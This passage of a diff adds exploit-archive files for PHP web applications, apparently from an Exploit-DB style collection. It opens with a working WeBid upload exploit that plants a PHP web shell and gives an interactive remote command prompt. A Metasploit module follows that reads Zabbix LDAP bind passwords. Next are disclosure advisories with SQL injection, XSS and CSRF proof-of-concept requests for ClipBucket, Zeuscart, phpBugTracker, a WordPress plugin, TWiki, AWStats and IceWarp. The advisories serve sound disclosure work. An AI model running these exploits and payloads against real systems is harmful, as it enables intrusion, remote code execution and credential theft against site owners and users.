EXPLOIT
|
||||
#####################################################
|
||||
|
||||
*/
|
||||
|
||||
error_reporting(0);
|
||||
set_time_limit(0);
|
||||
ini_set("default_socket_timeout", 5);
|
||||
|
||||
function http_send($host, $packet)
|
||||
{
|
||||
if (!($sock = fsockopen($host, 80)))
|
||||
die("\n[-] No response from {$host}:80\n");
|
||||
|
||||
fputs($sock, $packet);
|
||||
return stream_get_contents($sock);
|
||||
}
|
||||
|
||||
print "\n+----------------------------------------+";
|
||||
print "\n| WeBid Unrestricted File Upload Exploit |";
|
||||
print "\n+----------------------------------------+\n";
|
||||
|
||||
if ($argc < 3)
|
||||
{
|
||||
print "\nUsage......: php $argv[0] <host> <path>\n";
|
||||
print "\nExample....: php $argv[0] localhost /";
|
||||
print "\nExample....: php $argv[0] localhost /WeBid/\n";
|
||||
die();
|
||||
}
|
||||
|
||||
$host = $argv[1];
|
||||
$path = $argv[2];
|
||||
|
||||
$payload = "--o0oOo0o\r\n";
|
||||
$payload .= "Content-Disposition: form-data; name=\"name\"\r\n\r\n";
|
||||
$payload .= "shell.php\r\n";
|
||||
$payload .= "--o0oOo0o\r\n";
|
||||
$payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n";
|
||||
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
|
||||
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
|
||||
$payload .= "--o0oOo0o--\r\n";
|
||||
|
||||
$packet = "POST {$path}ajax.php?do=uploadaucimages HTTP/1.1\r\n";
|
||||
$packet .= "Host: {$host}\r\n";
|
||||
$packet .= "Content-Length: ".strlen($payload)."\r\n";
|
||||
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
|
||||
$packet .= "Cookie: PHPSESSID=cwh"."\r\n";
|
||||
$packet .= "Connection: close\r\n\r\n{$payload}";
|
||||
|
||||
print "\n\nExploiting...";
|
||||
sleep(2);
|
||||
print "Waiting for shell...\n";
|
||||
sleep(2);
|
||||
|
||||
http_send($host, $packet);
|
||||
|
||||
$packet = "GET {$path}uploaded/cwh/shell.php HTTP/1.1\r\n";
|
||||
$packet .= "Host: {$host}\r\n";
|
||||
$packet .= "Cmd: %s\r\n";
|
||||
$packet .= "Connection: close\r\n\r\n";
|
||||
|
||||
print "\n ,--^----------,--------,-----,-------^--, \n";
|
||||
print " | ||||||||| `--------' | O \n";
|
||||
print " `+---------------------------^----------| \n";
|
||||
print " `\_,-------, _________________________| \n";
|
||||
print " / XXXXXX /`| / \n";
|
||||
print " / XXXXXX / `\ / \n";
|
||||
print " / XXXXXX /\______( \n";
|
||||
print " / XXXXXX / \n";
|
||||
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
|
||||
print " (________( \n";
|
||||
print " `------' \n";
|
||||
|
||||
while(1)
|
||||
{
|
||||
print "\nWebid-shell# ";
|
||||
if (($cmd = trim(fgets(STDIN))) == "exit") break;
|
||||
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
|
||||
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
|
||||
}
|
||||
|
||||
################################################################################################################
|
||||
# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
|
||||
################################################################################################################
|
||||
?>
|
49
platforms/php/webapps/36156.txt
Executable file
49
platforms/php/webapps/36156.txt
Executable file
|
@ -0,0 +1,49 @@
|
|||
# Exploit Title : Clipbucket 2.7 RC3 0.9 Blind SQL Injection
|
||||
# Date : 20 February 2015
|
||||
# Exploit Author : CWH Underground
|
||||
# Site : www.2600.in.th
|
||||
# Vendor Homepage : http://clip-bucket.com/
|
||||
# Software Link : http://sourceforge.net/projects/clipbucket/files/ClipBucket%20v2/clipbucket-2.7.0.4.v2929-rc3.zip
|
||||
# Version : 2.7.0.4.v2929-rc3
|
||||
# Tested on : Window and Linux
|
||||
|
||||
,--^----------,--------,-----,-------^--,
|
||||
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
|
||||
`+---------------------------^----------|
|
||||
`\_,-------, _________________________|
|
||||
/ XXXXXX /`| /
|
||||
/ XXXXXX / `\ /
|
||||
/ XXXXXX /\______(
|
||||
/ XXXXXX /
|
||||
/ XXXXXX /
|
||||
(________(
|
||||
`------'
|
||||
|
||||
####################
|
||||
SOFTWARE DESCRIPTION
|
||||
####################
|
||||
|
||||
ClipBucket is an OpenSource Multimedia Management Script Provided Free to the Community.This script comes with all
|
||||
the bells & whistles required to start your own Video Sharing website like Youtube, Metacafe, Veoh, Hulu or any
|
||||
other top video distribution application in matter of minutes. ClipBucket is fastest growing script which was
|
||||
first started as Youtube Clone but now its advance features & enhancements makes it the most versatile, reliable &
|
||||
scalable media distribution platform with latest social networking features, while staying light on your pockets.
|
||||
Whether you are a small fan club or a big Multi Tier Network operator, Clipbucket will fulfill your video
|
||||
management needs.
|
||||
|
||||
##################################
|
||||
VULNERABILITY: Blind SQL Injection
|
||||
##################################
|
||||
|
||||
An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
|
||||
User tainted data is used when creating the database query that will be executed on the database management system (DBMS).
|
||||
An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system
|
||||
depending on the query, DBMS and configuration.
|
||||
|
||||
= POC =
|
||||
GET /clipbucket/view_item.php?item=a%27%20or%20%27a%27=%27a&type=photos&collection=9 => True Condition
|
||||
GET /clipbucket/view_item.php?item=a%27%20or%20%27a%27=%27b&type=photos&collection=9 => False Condition (Item does not exist.)
|
||||
|
||||
################################################################################################################
|
||||
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
|
||||
################################################################################################################
|
86
platforms/php/webapps/36157.rb
Executable file
86
platforms/php/webapps/36157.rb
Executable file
|
@ -0,0 +1,86 @@
|
|||
##
|
||||
# This module requires Metasploit
|
||||
# Date: 25-09-2013
|
||||
# Author: Pablo González
|
||||
# Vendor Homepage: Zabbix -> http://www.zabbix.com
|
||||
# Software Link: http://www.zabbix.com
|
||||
# Version: 2.0.5
|
||||
# Tested On: Linux (Ubuntu, Suse, CentOS)
|
||||
# CVE: CVE-2013-5572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5572
|
||||
# More Info: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5572
|
||||
# http://www.elladodelmal.com/2014/12/como-crear-el-modulo-metasploit-para-el.html
|
||||
# http://seclists.org/fulldisclosure/2013/Sep/151
|
||||
# http://www.cvedetails.com/cve/CVE-2013-5572/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'ldap_bind_password Zabbix CVE-2013-5572',
|
||||
'Description' => %q{
|
||||
Zabbix 2.0.5 allows remote authenticated users to discover the LDAP bind password by leveraging management-console access and reading the ldap_bind_password value in the HTML source code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ '@pablogonzalezpe, Pablo Gonzalez' ]
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('zbx_session', [true, 'Cookie zbx_sessionid']),
|
||||
OptString.new('TARGETURI', [true, 'Path Zabbix Authentication','/zabbix/authentication.php']),
|
||||
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
req
|
||||
end
|
||||
def req
|
||||
resp = send_request_cgi(
|
||||
{
|
||||
'host' => datastore['RHOST'],
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path.to_s),
|
||||
'cookie' => "zbx_sessionid=#{datastore['zbx_session']}",
|
||||
'content-type' => 'application/x-www-form-urlencoded'
|
||||
}, datastore['TIMEOUT'])
|
||||
|
||||
ldap_host(resp)
|
||||
user_passDomain(resp)
|
||||
user_zabbix(resp)
|
||||
end
|
||||
|
||||
def ldap_host(response)
|
||||
cut = response.body.split("ldap_host\" value=\"")[1]
|
||||
if cut != nil
|
||||
host = cut.split("\"")[0]
|
||||
print_good "LDAP Host => #{host}"
|
||||
end
|
||||
end
|
||||
|
||||
def user_passDomain(response)
|
||||
cut = response.body.split("ldap_bind_dn\" value=\"")[1]
|
||||
if cut != nil
|
||||
user = cut.split("\"")[0]
|
||||
print_good "User Domain? => #{user}"
|
||||
end
|
||||
cut = response.body.split("name=\"ldap_bind_password\" value=\"")[1]
|
||||
if cut != nil
|
||||
pass = cut.split("\"")[0]
|
||||
print_good "Password Domain? => #{pass}"
|
||||
end
|
||||
end
|
||||
|
||||
def user_zabbix(response)
|
||||
cut = response.body.split("user\" value=\"")[1]
|
||||
if cut != nil
|
||||
user = cut.split("\"")[0]
|
||||
print_good "User Zabbix => #{user}"
|
||||
end
|
||||
end
|
||||
end
|
146
platforms/php/webapps/36159.txt
Executable file
146
platforms/php/webapps/36159.txt
Executable file
|
@ -0,0 +1,146 @@
|
|||
Advisory: Multiple reflecting XSS-, SQLi and
|
||||
InformationDisclosure-vulnerabilities in Zeuscart v.4
|
||||
Advisory ID: SROEADV-2015-12
|
||||
Author: Steffen Rösemann
|
||||
Affected Software: Zeuscart v.4
|
||||
Vendor URL: http://zeuscart.com/
|
||||
Vendor Status: pending
|
||||
CVE-ID: will asked to be assigned after release on FullDisclosure via
|
||||
OSS-list
|
||||
Software used for research: Mac OS X 10.10, Firefox 35.0.1
|
||||
|
||||
==========================
|
||||
Vulnerability Description:
|
||||
==========================
|
||||
|
||||
ECommerce-Shopping Cart Zeuscart v. 4 suffers from multiple XSS-, SQLi- and
|
||||
InformationDisclosure-vulnerabilities.
|
||||
|
||||
==================
|
||||
Technical Details:
|
||||
==================
|
||||
|
||||
====
|
||||
XSS
|
||||
===
|
||||
|
||||
Reflecting XSS-vulnerabilities can be found in a common
|
||||
Zeuscart-installation in the following locations and could be exploited for
|
||||
example by crafting a link and make a registered user click on that link.
|
||||
|
||||
The parameter "search", which is used in the index.php is vulnerable to
|
||||
XSS-attacks.
|
||||
|
||||
Exploit-Example:
|
||||
|
||||
http://
|
||||
{TARGET}/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!--
|
||||
|
||||
By appending arbitrary HTML- and/or JavaScript-code to the parameter
|
||||
"schltr" which is as well used in index.php, an attacker could exploit this
|
||||
XSS-vulnerable parameter:
|
||||
|
||||
Exploit-Example:
|
||||
|
||||
http://
|
||||
{TARGET}/index.php?do=brands&schltr=All%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E
|
||||
|
||||
The third XSS-vulnerability can be found in the "brand"-parameter, which is
|
||||
again used in index.php.
|
||||
|
||||
Exploit-Example:
|
||||
|
||||
http://
|
||||
{TARGET}/index.php?do=viewbrands&brand=Bata%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E
|
||||
|
||||
====
|
||||
SQLi
|
||||
====
|
||||
|
||||
The SQL injection-vulnerabilities can be found in the administrative
|
||||
backend of Zeuscart v. 4 and reside in the following locations in a common
|
||||
installation.
|
||||
|
||||
By appending arbitrary SQL statements to the "id"-parameter, an attacker
|
||||
could exploit this SQL injection vulnerability:
|
||||
|
||||
Exploit-Example:
|
||||
|
||||
http://
|
||||
{TARGET}/admin/?do=disporders&action=detail&id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database%28%29,34,35,version%28%29,37,38+--+
|
||||
|
||||
Another SQL injection vulnerability can be found here and can be exploited
|
||||
by appending SQL statements to the vulnerable "cid"-parameter:
|
||||
|
||||
Exploit-Example:
|
||||
|
||||
http://
|
||||
{TARGET}/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+
|
||||
|
||||
The last SQL injection vulnerability I found can be found in the following
|
||||
location and can be exploited by appending SQL statements to the vulnerable
|
||||
"id" parameter:
|
||||
|
||||
http://
|
||||
{TARGET}/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--+
|
||||
|
||||
==============
|
||||
Information Disclosure
|
||||
==============
|
||||
|
||||
The administrative backend of Zeuscart v. 4 allows the admin to use a
|
||||
functionality, which displays the PHP-installation settings via phpinfo():
|
||||
|
||||
http://{TARGET}/admin/?do=getphpinfo
|
||||
|
||||
Unfortunately, the PHP-script does not check, if an authorized admin
|
||||
executes this functionality: It is possible even for unregistered users to
|
||||
request the above link to see the informations, phpinfo() displays. That
|
||||
could expose sensitive informations to an attacker which could lead to
|
||||
further exploitation.
|
||||
|
||||
|
||||
|
||||
=========
|
||||
Solution:
|
||||
=========
|
||||
|
||||
Vendor has been notified. After releasing a patch, which seems not to
|
||||
correct the issues, the vendor decided not to respond anymore to figure out
|
||||
a solution together. Currently, there is no patch available to secure
|
||||
Zeuscart-installations.
|
||||
|
||||
|
||||
====================
|
||||
Disclosure Timeline:
|
||||
====================
|
||||
21-Jan-2015 – found the vulnerabilities
|
||||
21-Jan-2015 - informed the developers (see [3])
|
||||
21-Jan-2015 – release date of this security advisory [without technical
|
||||
details]
|
||||
21-Jan-2015 – fork of the repository to keep the vulnerable version
|
||||
available for other researchers (see [5])
|
||||
22-Jan-2015 - vendor responded, provided detailed information
|
||||
04-Feb-2015 - vendor patches Bin/Core/Assembler.php; vulnerabilities are
|
||||
still exploitable, which has been reported to the vendor (see [3])
|
||||
19-Feb-2015 - asked the vendor again, if he will patch these issues (see
|
||||
[3]); vendor did not respond
|
||||
21-Feb-2015 - release date of this security advisory
|
||||
21-Feb-2015 - send to FullDisclosure
|
||||
|
||||
|
||||
========
|
||||
Credits:
|
||||
========
|
||||
|
||||
Vulnerabilities found and advisory written by Steffen Rösemann.
|
||||
|
||||
===========
|
||||
References:
|
||||
===========
|
||||
|
||||
[1] http://zeuscart.com/
|
||||
[2] https://github.com/ZeusCart/zeuscart
|
||||
[3] https://github.com/ZeusCart/zeuscart/issues/28
|
||||
[4] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-12.html
|
||||
[5] https://github.com/sroesemann/zeuscart
|
257
platforms/php/webapps/36160.txt
Executable file
257
platforms/php/webapps/36160.txt
Executable file
|
@ -0,0 +1,257 @@
|
|||
Advisory: Multiple SQLi, stored/reflecting XSS- and CSRF-vulnerabilities in
|
||||
phpBugTracker v.1.6.0
|
||||
Advisory ID: SROEADV-2015-16
|
||||
Author: Steffen Rösemann
|
||||
Affected Software: phpBugTracker v.1.6.0
|
||||
Vendor URL: https://github.com/a-v-k/phpBugTracker
|
||||
Vendor Status: patched
|
||||
CVE-ID: will asked to be assigned after release on FullDisclosure via
|
||||
OSS-list
|
||||
Tested on: OS X 10.10 with Firefox 35.0.1 ; Kali Linux 3.18, Iceweasel 31
|
||||
|
||||
==========================
|
||||
Vulnerability Description:
|
||||
==========================
|
||||
|
||||
The Issuetracker phpBugTracker v. 1.6.0 suffers from multiple SQLi-,
|
||||
stored/reflected XSS- and CSRF-vulnerabilities.
|
||||
|
||||
==================
|
||||
Technical Details:
|
||||
==================
|
||||
|
||||
The following files used in a common phpBugTracker installation suffer from
|
||||
different SQLi-, stored/reflected XSS- and CSRF-vulnerabilities:
|
||||
|
||||
===========
|
||||
project.php
|
||||
===========
|
||||
|
||||
SQL injection / underlaying CSRF vulnerability in project.php via id
|
||||
parameter:
|
||||
|
||||
http://
|
||||
{TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+
|
||||
|
||||
Stored XSS via input field "project name":
|
||||
|
||||
http://{TARGET}/admin/project.php?op=add
|
||||
|
||||
executed in: e.g. http://{TARGET}/admin/project.php, http://
|
||||
{TARGET}/index.php
|
||||
|
||||
|
||||
========
|
||||
user.php
|
||||
========
|
||||
|
||||
Reflecting XSS in user.php via use_js parameter:
|
||||
|
||||
http://
|
||||
{TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1
|
||||
|
||||
executed in: same page
|
||||
|
||||
|
||||
=========
|
||||
group.php
|
||||
=========
|
||||
|
||||
Reflecting XSS in group.php via use_js parameter:
|
||||
|
||||
http://
|
||||
{TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1
|
||||
|
||||
executed in: same page
|
||||
|
||||
(Blind) SQL Injection / underlaying CSRF vulnerability in group.php via
|
||||
group_id parameter (used in different operations):
|
||||
|
||||
http://
|
||||
{TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+
|
||||
http://
|
||||
{TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+
|
||||
|
||||
|
||||
==========
|
||||
status.php
|
||||
==========
|
||||
|
||||
SQL injection / underlaying CSRF vulnerability in status.php via status_id
|
||||
parameter:
|
||||
|
||||
http://
|
||||
{TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
|
||||
|
||||
Stored XSS via input field "Description":
|
||||
|
||||
http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0
|
||||
|
||||
executed in: e.g. http://{TARGET}/admin/status.php
|
||||
|
||||
CSRF vulnerability in status.php (delete statuses):
|
||||
|
||||
<img src="http://{TARGET}/admin/status.php?op=del&status_id={NUMERIC_STATUS_ID}"
|
||||
|
||||
|
||||
|
||||
==============
|
||||
resolution.php
|
||||
==============
|
||||
|
||||
SQL injection / underlaying CSRF vulnerability in resolution.php via
|
||||
resolution_id parameter:
|
||||
|
||||
http://
|
||||
{TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+
|
||||
|
||||
CSRF vulnerability in resolution.php (delete resolutions):
|
||||
|
||||
<img src="http://{TARGET}/admin/resolution.php?op=del&resolution_id={NUMERIC_RESOLUTION_ID}"
|
||||
|
||||
|
||||
|
||||
============
|
||||
severity.php
|
||||
============
|
||||
|
||||
SQL injection / underlaying CSRF vulnerability in severity.php via
|
||||
severity_id parameter:
|
||||
|
||||
http://
|
||||
{TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
|
||||
|
||||
CSRF vulnerability in severity.php (delete severities):
|
||||
|
||||
<img src="http://{TARGET}/admin/severity.php?op=del&severity_id={NUMERIC_SEVERITY_ID}"
|
||||
|
||||
|
||||
Stored XSS in severity.php via input field "Description":
|
||||
|
||||
http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0
|
||||
|
||||
executed in: e.g. http://{TARGET}/admin/severity.php
|
||||
|
||||
|
||||
============
|
||||
priority.php
|
||||
============
|
||||
|
||||
SQL injection / underlaying CSRF vulnerability in priority.php via
|
||||
priority_id parameter:
|
||||
|
||||
http://
|
||||
{TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+
|
||||
|
||||
|
||||
======
|
||||
os.php
|
||||
======
|
||||
|
||||
SQL Injection / underlaying CSRF vulnerability in os.php via os_id
|
||||
parameter:
|
||||
|
||||
http://
|
||||
{TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+
|
||||
|
||||
CSRF vulnerability in os.php (delete operating systems):
|
||||
|
||||
<img src="http://{TARGET}/admin/os.php?op=del&os_id={NUMERIC_OS_ID}" >
|
||||
|
||||
Stored XSS vulnerability in os.php via input field "Regex":
|
||||
|
||||
http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0
|
||||
|
||||
executed in: e.g. http://{TARGET}/admin/os.php?
|
||||
|
||||
|
||||
============
|
||||
database.php
|
||||
============
|
||||
|
||||
SQL injection / underlaying CSRF vulnerability in database.php via
|
||||
database_id:
|
||||
|
||||
http://
|
||||
{TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+
|
||||
|
||||
CSRF vulnerability in database.php (delete databases):
|
||||
|
||||
<img src="http://{TARGET}/admin/database.php?op=del&database_id={NUMERIC_DATABASE_ID}"
|
||||
|
||||
|
||||
Stored XSS vulnerability in database.php via input field "Name":
|
||||
|
||||
http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0
|
||||
|
||||
|
||||
========
|
||||
site.php
|
||||
========
|
||||
|
||||
CSRF vulnerability in site.php (delete sites):
|
||||
|
||||
<img src="http://{TARGET}/admin/site.php?op=del&site_id={NUMERIC_SITE_ID}" >
|
||||
|
||||
SQL injection / underlaying CSRF vulnerability in site.php via site_id
|
||||
parameter:
|
||||
|
||||
http://
|
||||
{TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+
|
||||
|
||||
|
||||
=======
|
||||
bug.php
|
||||
=======
|
||||
|
||||
This issue has already been assigned CVE-2004-1519, but seems to have not
|
||||
been corrected since the assignment:
|
||||
|
||||
SQL injection / underlaying CSRF vulnerability in bug.php via project
|
||||
parameter:
|
||||
|
||||
http://
|
||||
{TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+
|
||||
|
||||
For details see http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519.
|
||||
|
||||
|
||||
|
||||
=========
|
||||
Solution:
|
||||
=========
|
||||
|
||||
Update to version 1.7.0.
|
||||
|
||||
|
||||
====================
|
||||
Disclosure Timeline:
|
||||
====================
|
||||
03/05-Feb-2015 – found the vulnerabilities
|
||||
05-Feb-2015 - informed the developers (see [3])
|
||||
05-Feb-2015 – release date of this security advisory [without technical
|
||||
details]
|
||||
05-Feb-2015 - forked the Github repository, to keep it available for other
|
||||
security researchers (see [4])
|
||||
05/06-Feb-2015 - vendor replied, will provide a patch for the
|
||||
vulnerabilities
|
||||
09-Feb-2015 - vendor provided a patch (version 1.7.0, see [3]); technical
|
||||
details will be released on 19th February 2015
|
||||
19-Feb-2015 - release date of this security advisory
|
||||
19-Feb-2015 - send to FullDisclosure
|
||||
|
||||
|
||||
========
|
||||
Credits:
|
||||
========
|
||||
|
||||
Vulnerabilities found and advisory written by Steffen Rösemann.
|
||||
|
||||
===========
|
||||
References:
|
||||
===========
|
||||
|
||||
[1] https://github.com/a-v-k/phpBugTracker
|
||||
[2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-16.html
|
||||
[3] https://github.com/a-v-k/phpBugTracker/issues/4
|
||||
[4] https://github.com/sroesemann/phpBugTracker
|
63
platforms/php/webapps/36161.txt
Executable file
63
platforms/php/webapps/36161.txt
Executable file
|
@ -0,0 +1,63 @@
|
|||
====================================================
|
||||
Product: Easy Social Icons WordPress plugin
|
||||
Vendor: CyberNetikz
|
||||
Tested Version: 1.2.2
|
||||
Vulnerability Type: XSS [CWE-79] and CSRF [CWE-352]
|
||||
Risk Level: Medium
|
||||
Solution Status: Solved in version 1.2.3
|
||||
Discovered and Provided: Eric Flokstra - ITsec Security Services
|
||||
====================================================
|
||||
[-] About the Vendor:
|
||||
|
||||
Easy Social Icons is a WordPress plugin and can be used to set icons on the public page in order to link to social media platforms such as LinkedIn, Twitter or Facebook.
|
||||
|
||||
[-] Advisory Details:
|
||||
|
||||
It is discovered that insufficient validation is performed on the 'image_file' parameter enabling arbitrary JavaScript to be injected. On top of that no random tokens are used to prevent CSRF attacks. By combining these vulnerabilities an attacker could for example trick an admin into setting a persistent XSS payload on the public WordPress page.
|
||||
|
||||
[-] Proof of Concept:
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://10.0.2.215/wordpress/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=1" <http://10.0.2.215/wordpress/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=1> method="POST" enctype="multipart/form-data">
|
||||
<input type="hidden" name="title" value="Example" />
|
||||
<input type="hidden" name="image_file" value="http://10.0.2.215/wordpress/wp-content/uploads/2015/02/cookie.jpg"><script>alert(1)</script>" />
|
||||
<input type="hidden" name="url" value="http://www.example.org" />
|
||||
<input type="hidden" name="sortorder" value="0" />
|
||||
<input type="hidden" name="target" value="1" />
|
||||
<input type="hidden" name="action" value="edit" />
|
||||
<input type="hidden" name="id" value="1" />
|
||||
<input type="hidden" name="submit_button" value="Save Changes" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
[-] Disclosure Timeline:
|
||||
|
||||
[02 Feb 2015]: Vendor notification
|
||||
[02 Feb 2015]: Vulnerability confirmation
|
||||
[11 Feb 2015]: Vulnerability patched
|
||||
[19 Feb 2015]: Public disclosure
|
||||
|
||||
[-] Solution:
|
||||
|
||||
Update to the latest version of Easy Social Icons.
|
||||
|
||||
[-] References:
|
||||
|
||||
[1] Easy Social Icons Changelog -- https://wordpress.org/plugins/easy-social-icons/changelog/
|
||||
[2] Common Weakness Enumeration (CWE) -- http://cwe.mitre.org
|
||||
[3] ITsec Security Services BV -- http://www.itsec.nl
|
||||
|
||||
------------------------------------------------------------------------
|
||||
ITsec Security Services bv. (KvK. 34181927)
|
||||
|
||||
Postal Address:
|
||||
P.O. Box 5120, 2000GC Haarlem
|
||||
Visitors Address:
|
||||
Kenaupark 23, 2011 MR Haarlem
|
||||
|
||||
Phone: +31 - (0)23 542 05 78
|
||||
|
||||
The information contained in this email communication is confidential and is intended solely for the use of the individual or entity to whom it is addressed and others authorized to receive it. If you are not the intended recipient, you are hereby notified that any disclosure, copying,distribution, or taking any action in reliance of the contents of this information is strictly prohibited and may be unlawful. No rights may be attached to this message. ITsec does not accept any liability for incorrect and incomplete transmission or delayed receipt of this e-mail nor for the effects or damages caused by the direct or indirect use of the information or functionality provided by this posting, nor the content contained within.Use them at your own risk.
|
9
platforms/php/webapps/36162.txt
Executable file
9
platforms/php/webapps/36162.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/49746/info
|
||||
|
||||
TWiki is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Versions prior to TWiki 5.1.0 are vulnerable.
|
||||
|
||||
http://example.com/do/view/Main/Jump?create=on&newtopic=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%280x0051D1%29%3C/script%3E&template=WebCreateNewTopic&topicparent=3
|
9
platforms/php/webapps/36163.txt
Executable file
9
platforms/php/webapps/36163.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/49746/info
|
||||
|
||||
TWiki is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Versions prior to TWiki 5.1.0 are vulnerable.
|
||||
|
||||
http://example.com/do/view/TWiki/ATasteOfTWiki?'"--></style></script><script>alert(0x002B48)</script>
|
10
platforms/php/webapps/36164.txt
Executable file
10
platforms/php/webapps/36164.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/49749/info
|
||||
|
||||
AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
AWStats 7.0 and 6.95 are vulnerable; other versions may also be affected.
|
||||
|
||||
http://example.com/awredir.pl?url=%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
||||
http://example.com/awredir.pl?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
54
platforms/php/webapps/36165.txt
Executable file
54
platforms/php/webapps/36165.txt
Executable file
|
@ -0,0 +1,54 @@
|
|||
source: http://www.securityfocus.com/bid/49753/info
|
||||
|
||||
IceWarp Web Mail is prone to multiple information-disclosure vulnerabilities.
|
||||
|
||||
Attackers can exploit these issues to gain access to potentially sensitive information, and possibly cause denial-of-service conditions; other attacks may also be possible.
|
||||
|
||||
Proof-of-Concept:
|
||||
|
||||
The following POST request was sent to the host A.B.C.D where the IceWarp mail
|
||||
server was running:
|
||||
|
||||
REQUEST
|
||||
=========
|
||||
POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1
|
||||
Host:A.B.C.D
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
|
||||
Firefox/5.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language:en-gb,en;q=0.5i've
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
|
||||
Proxy-Connection: keep-alive
|
||||
Referer: http://A.B.C.D
|
||||
Content-Length: 249
|
||||
Content-Type: application/xml;
|
||||
charset=UTF-8
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache
|
||||
|
||||
